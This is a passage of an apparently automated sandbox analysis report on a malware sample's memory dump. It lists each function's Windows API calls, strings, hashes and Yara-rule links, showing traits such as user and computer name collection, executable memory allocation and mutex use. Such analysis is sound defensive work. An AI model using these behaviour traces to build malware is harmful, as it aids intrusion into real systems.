HeapFree.KERNEL32(00000000,00000000,?), ref: 00753E91

Strings

W, xrefs: 00753D50

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlenmemcpy
String ID: W
API String ID: 379260646-655174618
Opcode ID: 26c1a23840c4854e11392c550e2f498918b80edea7f6133e8a0ab8fa9bd75021
Instruction ID: bd109c01fa4684f369f24aa55b3dd6ec8d0f93b3daa8d89c2acb5a02dfd50263
Opcode Fuzzy Hash: 26c1a23840c4854e11392c550e2f498918b80edea7f6133e8a0ab8fa9bd75021
Instruction Fuzzy Hash: 9B41D371500209DFDB248F29D8887EA77F5AF043C2F40802AEC59C7231C6BC9A89CB46

Uniqueness

Uniqueness Score: -1.00%

Function 007512B7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00751362
FlushFileBuffers.KERNEL32(00000000,?,?,00000050), ref: 007513CF
GetLastError.KERNEL32(?,?,00000050), ref: 007513D9

Strings

P, xrefs: 0075138C
K, xrefs: 00751390

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: d2455ee06258b57c17ae8a6abf33f3906cbd8bd3cb407e87991ed17aacac9511
Instruction ID: 6d7b6f67519e268a103f4adcd56cae20c4e4f7d59993f35252e1c40dd382d241
Opcode Fuzzy Hash: d2455ee06258b57c17ae8a6abf33f3906cbd8bd3cb407e87991ed17aacac9511
Instruction Fuzzy Hash: B4418D71A00605DFDB24CFA8C9947AFBBF1FF14702F94852DD88692A41E378AA49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0076F8D0 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00768DC8,00000000,?,?,?,00768DC8,?,?,?,?,?), ref: 0076F90E
lstrlen.KERNEL32(00768DC8,?,?,?,00768DC8,?,?,?,?,?), ref: 0076F92C
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0076F99B
lstrlen.KERNEL32(00768DC8,00000000,00000000,?,?,?,00768DC8,?,?,?,?,?), ref: 0076F9BC
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0076F9D0
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0076F9D9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0076F9E7

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 88db9d98479f6d3213317fbf9f7d3da22a42d25e34f48461155a9ed161a8b3b2
Instruction ID: 838ff3ce2ab296b477737833036cfcbf5f79d8656abcaa22763f977b24b33432
Opcode Fuzzy Hash: 88db9d98479f6d3213317fbf9f7d3da22a42d25e34f48461155a9ed161a8b3b2
Instruction Fuzzy Hash: 33411D7280021AEFCF119F64EC458DA7BA8EF043A4B058025FD19A7211D735EE60DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0076C9FC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0076CA55
memcpy.NTDLL(00000018,?,?), ref: 0076CA7E
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00016B31,00000000,000000FF,00000008), ref: 0076CABD
HeapFree.KERNEL32(00000000,00000000), ref: 0076CAD0

Strings

"w, xrefs: 0076CA33

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID: "w
API String ID: 2780211928-2380412451
Opcode ID: ea3273c9f9103999cd2c42a2b9b85f49a80885c1fa66b4ac0cc3883e8f21a251
Instruction ID: 094508684e64dffa7706e1b75fdb88a752b637d7295e8d66b1dc4a867089eba4
Opcode Fuzzy Hash: ea3273c9f9103999cd2c42a2b9b85f49a80885c1fa66b4ac0cc3883e8f21a251
Instruction Fuzzy Hash: 23318170200209EFDB21CF64DC44EAA7BA9FF04360F008529F95AD62A0DB78ED51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0076E16E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076E19D
lstrlen.KERNEL32(00753911), ref: 0076E1AE

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

strcpy.NTDLL ref: 0076E1C5
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0076E1CF

Strings

%w, xrefs: 0076E1FE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID: %w
API String ID: 528014985-3265503460
Opcode ID: bee52085fc0bd0616f94d357fabb0528fd57b28914effa8eeba2df4d17c8f862
Instruction ID: 826327e982eb7eac4abb3ac5b0217f831103fb090066789f06363391ce6a328f
Opcode Fuzzy Hash: bee52085fc0bd0616f94d357fabb0528fd57b28914effa8eeba2df4d17c8f862
Instruction Fuzzy Hash: 8A21FF7A104700AFE7246B64EC49B2A73ADFF44351F108419FD5B86291EBB8D840CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00759C6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00778448), ref: 00759C75
Sleep.KERNEL32(0000000A,?,?,00760B38,00000000), ref: 00759C7F
SetEvent.KERNEL32(?,?,00760B38), ref: 00759CD6
RtlLeaveCriticalSection.NTDLL(00778448), ref: 00759CF5

Strings

0xw, xrefs: 00759CEA

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID: 0xw
API String ID: 1925615494-4071435235
Opcode ID: e57d948bee301bacc44e59e5522106728cb623867fe17c1e2aa6ddb731a15b31
Instruction ID: 699a245c33072d9d65e9c1df2c72b2e891360ed0fe9c4fbfcd25adee9ae8ccdb
Opcode Fuzzy Hash: e57d948bee301bacc44e59e5522106728cb623867fe17c1e2aa6ddb731a15b31
Instruction Fuzzy Hash: E9019670680305EFEB409B74DD4DB5A3BA8FB14785F108021FB19D6190DBBC9944CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0075DE3C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075E0E9

Part of subcall function 0076B04C: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,?,?,?,0075DF56,?,?,0076DB75,?,00000000), ref: 0076B071
Part of subcall function 0076B04C: GetProcAddress.KERNEL32(00000000,?), ref: 0076B093
Part of subcall function 0076B04C: GetProcAddress.KERNEL32(00000000,?), ref: 0076B0A9
Part of subcall function 0076B04C: GetProcAddress.KERNEL32(00000000,?), ref: 0076B0BF
Part of subcall function 0076B04C: GetProcAddress.KERNEL32(00000000,?), ref: 0076B0D5
Part of subcall function 0076B04C: GetProcAddress.KERNEL32(00000000,?), ref: 0076B0EB

Part of subcall function 007601C6: memcpy.NTDLL(6A5F0866,6A5F086E,?,?,0076DB75,?,?,?,?,?,0076DB75,?,00000000), ref: 0076023A
Part of subcall function 007601C6: memcpy.NTDLL(?,?,?), ref: 007602A1

memcpy.NTDLL(?,?,?,?,?,?,?,?,0076DB75,?,00000000), ref: 0075DFB5

Part of subcall function 00752A2A: GetModuleHandleA.KERNEL32(?,?,0076DB75,0075E070,0076DB75,0076DB75,?,00000000), ref: 00752A68
Part of subcall function 00752A2A: memcpy.NTDLL(?,0077832C,00000018,?,?,?), ref: 00752AE4

memcpy.NTDLL(0076DB8D,?,00000018,?,?,?,?,?,0076DB75,?,00000000), ref: 0075E003
memcpy.NTDLL(0076DB35,cu,00000800,0076DB75,0076DB75,?,00000000), ref: 0075E083

Strings

cu, xrefs: 0075E07C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memcpy$AddressProc$HandleModule$memset
String ID: cu
API String ID: 1554640953-2324572491
Opcode ID: b6a82bec0cf06b078121fcaf439e1a4f93750e8c29030069c7a9e32ed5a45a87
Instruction ID: da59ecc4ee9eeaa737e055f5f17ab5b156aec6b26c7c2a3694807224f0a8061b
Opcode Fuzzy Hash: b6a82bec0cf06b078121fcaf439e1a4f93750e8c29030069c7a9e32ed5a45a87
Instruction Fuzzy Hash: 72915C7190020AEFDF25DF94C885BEEBBB4FF04305F204469E815A7291D7B9AE58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0076657A Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00756A99: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,00000000,?,0075158A), ref: 00756AAA
Part of subcall function 00756A99: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,0075158A), ref: 00756AC7

lstrlenW.KERNEL32(?,00000000,00000020,80000001,?,76B306E0), ref: 007665C6
lstrlenW.KERNEL32(00000008), ref: 007665CD
lstrlenW.KERNEL32(?,?), ref: 007665EB
lstrlen.KERNEL32(00000000,?,00000000), ref: 007666A9
lstrlenW.KERNEL32(?), ref: 007666B4
wsprintfA.USER32 ref: 007666F6

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 007556D7
Part of subcall function 00755697: GetLastError.KERNEL32(?,00000080,00000000), ref: 007556E1
Part of subcall function 00755697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 00755706
Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,00000080,00000000), ref: 00755729
Part of subcall function 00755697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 00755751
Part of subcall function 00755697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 00755766
Part of subcall function 00755697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 00755773
Part of subcall function 00755697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0075578B

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
String ID:
API String ID: 1727939831-0
Opcode ID: c7cd433729da4e2dc3c7b170ca08709680a45eadcc68bccf503917e1592df0d5
Instruction ID: 37ba8dd4c5b631f3d4e353e149fbc8036065e29626418efc39af8b7eebc13457
Opcode Fuzzy Hash: c7cd433729da4e2dc3c7b170ca08709680a45eadcc68bccf503917e1592df0d5
Instruction Fuzzy Hash: 2F516C7290020AEFDF019FA4CC89CAE7BBABF44344B448069FD19A7221DB3DDA11DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00758A7E Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpy.KERNEL32(?,00000020), ref: 00758B7B
lstrcat.KERNEL32(?,00000020), ref: 00758B90
lstrcmp.KERNEL32(00000000,?), ref: 00758BA7
lstrlen.KERNEL32(?), ref: 00758BCB

Strings

, xrefs: 00758B14

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: e87e2de77800b946d249faace331308179194f59a5471685bf16462cff013384
Instruction ID: 01728da00e399f8128a194072766e2f9bf673311a49b4df072c6b14eb6355cda
Opcode Fuzzy Hash: e87e2de77800b946d249faace331308179194f59a5471685bf16462cff013384
Instruction Fuzzy Hash: 6451C4B1A00108EBCF61DF99C8856EDBBBAFF45356F15C05BEC14AB201CBB89A45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0076853A Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 007702A5: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 007702B1
Part of subcall function 007702A5: SetLastError.KERNEL32(000000B7,?,0076854E,?,?,00000000,?,?,?,?,?,?), ref: 007702C2

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?,?,?,?), ref: 0076856E
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 00768646

Part of subcall function 0076BF9A: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0076BFB4
Part of subcall function 0076BF9A: CreateWaitableTimerA.KERNEL32(00778208,00000003,?), ref: 0076BFD1
Part of subcall function 0076BF9A: GetLastError.KERNEL32(?,?,007685A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0076BFE2
Part of subcall function 0076BF9A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C022
Part of subcall function 0076BF9A: SetWaitableTimer.KERNEL32(00000000,007685A2,00000000,00000000,00000000,00000000,?,?,007685A2,?), ref: 0076C041
Part of subcall function 0076BF9A: HeapFree.KERNEL32(00000000,007685A2,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C057

GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 0076862F
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 00768638

Part of subcall function 007702A5: CreateMutexA.KERNEL32(00778208,00000000,?,?,0076854E,?,?,00000000,?,?,?,?,?,?), ref: 007702D5

GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?), ref: 00768653

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: e73842b82adadafbd9322f9c22ad4e971922a4985b1f825e2e4dc6b8e4782733
Instruction ID: 117221d7889ba6ec341618e30a9c79f2388eb062843d24986244d12c789dfea7
Opcode Fuzzy Hash: e73842b82adadafbd9322f9c22ad4e971922a4985b1f825e2e4dc6b8e4782733
Instruction Fuzzy Hash: B231A371A00204DFCB51AF74DC588AA7BBAFB89350B208965FC07D7261DF398981CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00755011 Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0075502A

Part of subcall function 0076D0F7: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0075EB10), ref: 0076D11D

HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0075506C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 007550BE
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 007550D7

Part of subcall function 00753CD3: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00753CF4
Part of subcall function 00753CD3: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00753D37

GetLastError.KERNEL32 ref: 0075510F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 58d7d7d46df2a3f488cae3d2543a0514b179fb07402fcdc29a8f41c4c90704cc
Instruction ID: ffc352c7d78dc4192f7b3ababf675793613f147c7b436c2a3c46fcfb57b8b8ac
Opcode Fuzzy Hash: 58d7d7d46df2a3f488cae3d2543a0514b179fb07402fcdc29a8f41c4c90704cc
Instruction Fuzzy Hash: 7A31AE30A00608EFDF10DFA4DC54AEE7BB4EB08391F104065EC09A7250D7B99E88CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0076CBA5 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0076CBC0
memset.NTDLL ref: 0076CBD3

Part of subcall function 0076CE46: OpenProcess.KERNEL32(00000410,FD189D89,00769026,00000000,0000001C,00000000,00000000,?,?,?,00769026), ref: 0076CEA0
Part of subcall function 0076CE46: CloseHandle.KERNEL32(00000000,00000000,00000000,00769036,00000104,?,?,?,00769026), ref: 0076CEBE
Part of subcall function 0076CE46: GetSystemTimeAsFileTime.KERNEL32(00769026), ref: 0076CF26

Strings

t'w, xrefs: 0076CBDE
~'w, xrefs: 0076CC22
j'w, xrefs: 0076CC72

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Timememset$CloseFileHandleOpenProcessSystem
String ID: j'w$t'w$~'w
API String ID: 3426977178-2976150505
Opcode ID: be2ca77fba103381ae2f3c69ad9bec75f66fa21384975ddfcc26a12f545b6a00
Instruction ID: f346c4240672e2071aa2aa89deeeb6e9892a84fba1abf0516368a8a4fb6e4d6a
Opcode Fuzzy Hash: be2ca77fba103381ae2f3c69ad9bec75f66fa21384975ddfcc26a12f545b6a00
Instruction Fuzzy Hash: 1931A232D0221CABCB22EBA4DD09BEE7A78AF44750F004156FD49A7280D6789E41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0076B9D9 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0076BA5B
lstrcpy.KERNEL32(00000000,?), ref: 0076BA74
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0076BA81
lstrlen.KERNEL32(0077932D,?,?,?,?,?,00000000,00000000,?), ref: 0076BA93
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0076BAC4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 073106dc034908556edd07ff6f3160a34b46f73de67ff3cb1aac3de0c0c205ad
Instruction ID: 59ee42799bb5bc524d6973392f7067cc0446c4245a340a62e3bd6b2940e23791
Opcode Fuzzy Hash: 073106dc034908556edd07ff6f3160a34b46f73de67ff3cb1aac3de0c0c205ad
Instruction Fuzzy Hash: A5316B72500209EFDB11DFA5DC89EEE7BB9EF45350F048114FD1992210DB789A95DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00763E4E Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076592E: RtlEnterCriticalSection.NTDLL(00778448), ref: 00765936
Part of subcall function 0076592E: RtlLeaveCriticalSection.NTDLL(00778448), ref: 0076594B
Part of subcall function 0076592E: InterlockedIncrement.KERNEL32(0000001C), ref: 00765964

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00763E85
memcpy.NTDLL(00000000,?,?), ref: 00763E96
lstrcmpi.KERNEL32(00000002,?), ref: 00763EDC
memcpy.NTDLL(00000000,?,?), ref: 00763EF0
HeapFree.KERNEL32(00000000,00000000,?), ref: 00763F36

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 733514052-0
Opcode ID: 2cce133477dbc538509d4d47b0c1af86705d70537ae8e5046d8143101ea34ddc
Instruction ID: bb43dcbcd54110020ee36b318aca2b839aac6ff49e4c109f1880f5a45d6af297
Opcode Fuzzy Hash: 2cce133477dbc538509d4d47b0c1af86705d70537ae8e5046d8143101ea34ddc
Instruction Fuzzy Hash: 4B317F72900219EFDB109FA4DC88AAE7BB8FF04354F144029F90A97210D7799E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007584FB Relevance: 7.6, APIs: 5, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00758529
GetLastError.KERNEL32 ref: 00758551
GetModuleHandleA.KERNEL32(?,03F0987E), ref: 00758581
GetProcAddress.KERNEL32(00000000), ref: 00758588
RtlNtStatusToDosError.NTDLL(00000000), ref: 007585BE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressErrorProc$HandleLastModuleStatus
String ID:
API String ID: 1730001750-0
Opcode ID: a257bf84f45f3df2fa379b0649d19093c62a7333512cdf44475c0e8318521f9d
Instruction ID: a6360102f7ddb08c98e4a0e4365c63b42f81d46b4ed7b29317f16a1b56380a3a
Opcode Fuzzy Hash: a257bf84f45f3df2fa379b0649d19093c62a7333512cdf44475c0e8318521f9d
Instruction Fuzzy Hash: 1C217C71200118AFCB51DF64DC88DEE3BA9FB057A1B504815F909E7220EB789DA4CB76

Uniqueness

Uniqueness Score: -1.00%

Function 0075E852 Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0076F85D: lstrlen.KERNEL32(?,00000000,?,00000008,007703F4,?,00000000,?,00000000,03F0C2B8,03F0C2B8,77D3EB70,0076C6CE,?,?,?), ref: 0076F869

RtlEnterCriticalSection.NTDLL(00778448), ref: 0075E87C
RtlLeaveCriticalSection.NTDLL(00778448), ref: 0075E88F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 0075E8A0
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0075E90B
InterlockedIncrement.KERNEL32(0077845C), ref: 0075E922

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: fbcb451c32bfcc5ad7a14ec27c49f8eabb1d4294e061b541ceb216e40b951fb3
Instruction ID: 4f8933487124e1f238df673677ca72eab3c56bb5861118592f5542ba1f677736
Opcode Fuzzy Hash: fbcb451c32bfcc5ad7a14ec27c49f8eabb1d4294e061b541ceb216e40b951fb3
Instruction Fuzzy Hash: 5531E531A00306DFC794DF18D84896AB7B5FB44362F04852DF85983210DBB8EE55CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0075B360 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,0076C561), ref: 0075B374
GetComputerNameW.KERNEL32(00000000,0076C561), ref: 0075B390

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetUserNameW.ADVAPI32(00000000,0076C561), ref: 0075B3CA
GetComputerNameW.KERNEL32(0076C561,775EC740), ref: 0075B3ED
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0076C561,00000000,0076C563,00000000,00000000,?,775EC740,0076C561), ref: 0075B410

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: d660178eed0276c8f0f8e2b5c23209c9150f352f1ee6d2cd429b2b32f5521acd
Instruction ID: 362af43e1db3d3b0abf90d392af61384fd5779c7e288412a0bc131173627a6ca
Opcode Fuzzy Hash: d660178eed0276c8f0f8e2b5c23209c9150f352f1ee6d2cd429b2b32f5521acd
Instruction Fuzzy Hash: 4321D9B6900248FFCB11DFE4D9858FEBBB9EF44340B5084AAE505E7241D7749B44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0075A165 Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C
Part of subcall function 0076E52A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
Part of subcall function 0076E52A: GetCurrentThreadId.KERNEL32 ref: 0076E562
Part of subcall function 0076E52A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
Part of subcall function 0076E52A: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
Part of subcall function 0076E52A: lstrcpy.KERNEL32(00000000), ref: 0076E59E

DeleteFileA.KERNEL32(00000000,000004D2), ref: 0075A188
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0075A191
GetLastError.KERNEL32 ref: 0075A19B
HeapFree.KERNEL32(00000000,00000000), ref: 0075A25A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID:
API String ID: 3543646443-0
Opcode ID: f27c19142ef0a499c2803cf6ccda670d87a679d7ce9c780cc03176d31fed77ed
Instruction ID: 521cb487d33892e9204989490383fd49e94825e9e61f94b9d11b47a0be1cd886
Opcode Fuzzy Hash: f27c19142ef0a499c2803cf6ccda670d87a679d7ce9c780cc03176d31fed77ed
Instruction Fuzzy Hash: 1821A976141114FFDA00A7A5EC4DE9A339CEF46391B408151FB0ECB251EA3CE945C77A

Uniqueness

Uniqueness Score: -1.00%

Function 0075CC01 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,00000000), ref: 0075CC5E

Strings

Uqt, xrefs: 0075CCCC
~ Uqt, xrefs: 0075CCF8
Uqt, xrefs: 0075CCB1

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: Uqt$ Uqt$~ Uqt
API String ID: 1586166983-4098277104
Opcode ID: 6fe4ac1a8b4fae1f5c82a5e683cdd336e6cb1f41456af2cb2942b12a1134b5fb
